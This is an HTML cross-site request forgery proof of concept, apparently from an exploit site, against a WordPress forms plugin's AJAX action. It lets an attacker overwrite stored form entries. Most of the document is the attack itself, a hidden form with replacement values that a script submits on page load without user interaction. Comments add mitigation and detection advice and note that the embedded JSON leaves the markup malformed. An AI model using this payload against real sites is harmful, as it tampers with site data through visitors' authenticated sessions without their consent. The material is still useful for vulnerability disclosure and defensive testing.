## https://sploitus.com/exploit?id=WPEX-ID:C7CE2649-B2B0-43F4-994D-07B1023405E9
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>CSRF PoC</title>
</head>
<body>
<h1>CSRF PoC</h1>
<!--
  Cross-site request forgery demonstration against a WordPress AJAX action.
  The hidden form below posts to /wp-admin/admin-ajax.php with
  action=rednao_smart_forms_edit_form_values. It carries no nonce or other
  anti-CSRF token field, so the request only succeeds if the server-side
  handler does not verify one (presumably the case in the affected plugin
  version; confirm against the advisory).
  Fields:
    action         : selects the admin-ajax handler to run.
    entryId        : presumably the stored form entry to overwrite (7 is a sample value).
    entryString    : JSON map of field ids (rnField1..rnField3) to replacement values.
    elementOptions : JSON array describing the form's field definitions.
  YOUR-WEBSITE-URL in the action attribute is a placeholder, not a real host.
  NOTE(review): the JSON inside the value attributes contains raw double
  quotes, so the markup as extracted here is not well-formed HTML; read it as
  an illustration of the request parameters.
  Mitigation: the handler should verify a nonce (check_ajax_referer or
  wp_verify_nonce) and a capability (current_user_can) before modifying an
  entry. Browser SameSite cookie defaults can reduce exposure but are not a
  substitute for the server-side check.
  Detection: POST requests to admin-ajax.php with this action value whose
  Origin or Referer header is not the site's own origin.
-->
<form id="csrfForm" action="https://YOUR-WEBSITE-URL/wp-admin/admin-ajax.php" method="post" style="display: none;">
<input type="hidden" name="action" value="rednao_smart_forms_edit_form_values">
<input type="hidden" name="entryId" value="7">
<input type="hidden" name="entryString" value="{"rnField1":{"value":"Mr Hacker"},"rnField2":{"value":"mehdi@mtest.com"},"rnField3":{"value":"SUCCESSFUL FIELD HACK"}}">
<input type="hidden" name="elementOptions" value="[{"_id":35,"ClassName":"rednaotextinput","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"35","Type":"single"},"Id":"rnField1","Spacing":"col-sm-12","Label":"Name","Placeholder":"","Value":"","ReadOnly":"n","Width":"","Icon":{"ClassName":""},"CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"_Selected":true},{"_id":36,"ClassName":"rednaoemail","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"37","Type":"single"},"Id":"rnField2","Spacing":"col-sm-12","Label":"Email","Placeholder":"","Icon":{"ClassName":""},"CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"Value":"","ReadOnly":"n","_Selected":true},{"_id":37,"ClassName":"rednaotextarea","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"39","Type":"single"},"Id":"rnField3","Spacing":"col-sm-12","Label":"Message","DefaultText":"","Value":"","Width":"","Height":"","Placeholder":"","Disabled":"n","MaxLength":"","CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"_Selected":true},{"_id":38,"ClassName":"rednaosubmissionbutton","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"41","Type":"single"},"Id":"rnField4","Spacing":"col-sm-12","ButtonText":"Send","CustomCSS":"","Icon":{"ClassName":"glyphicon glyphicon-send","Orientation":"Add"},"Animated":"y","Action":"submit","_Selected":true}]">
</form>
<script>
// Submits the hidden form as soon as this inline script runs, with no click
// or other interaction from the visitor. This is why the server must not
// treat the session cookie alone as proof that the user intended the edit.
document.getElementById('csrfForm').submit();
</script>
</body>
</html>